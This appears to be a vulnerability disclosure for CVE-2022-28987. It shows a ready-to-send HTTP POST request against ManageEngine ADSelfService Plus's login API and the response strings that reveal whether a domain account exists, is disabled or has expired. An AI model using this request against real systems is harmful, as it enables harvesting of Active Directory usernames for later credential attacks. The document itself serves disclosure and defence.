Headline
CVE-2022-28987: vulnerability-research/adselfservice-userenum.md at main · passtheticket/vulnerability-research
ManageEngine ADSelfService Plus v6.1 allows attackers to perform username enumeration via a crafted POST request to /ServletAPI/accounts/login.
Permalink
Zoho ManageEngine ADSelfService Plus 6121 Username Enumeration
- Version: 6.1 Build 6121
- Tested against: ADSelfService 6118 - 6121
The domain username (sAMAccountName) enumeration can be conducted through the app. The domain users which are enrolled to the AdSelfService can be enumerated according to response of the application.
Sending following POST request vulnerability is exploited:
PoC HTTP Request:
POST /ServletAPI/accounts/login HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
DNT: 1
Connection: close
Sec-GPC: 1
loginName=USERNAME
The Administrator, krbtgt, Guest are default accounts in the Active Directory. The krbtgt and guest accounts are disabled defaultly.
- If the user is not exist , the response is “eSTATUS":"Permission Denied. Kindly contact your Administrator.”
- If the user is exist , the response is “"LOGIN_STATUS":"PASSWORD","WELCOME_NAME":"{Username}”
- If the user is disabled for example Guest or krbtgt user, the response is “eSTATUS":"Your account has been disabled. Please see your system administrator.”
- If the user is expired, the response is “eSTATUS":"Your account has expired. Please see your system administrator.”
Related news
Zoho ManageEngine ADSelfService Plus before 6121, ADAuditPlus 7060, Exchange Reporter Plus 5701, and ADManagerPlus 7131 allow NTLM Hash disclosure during certain storage-path configuration steps.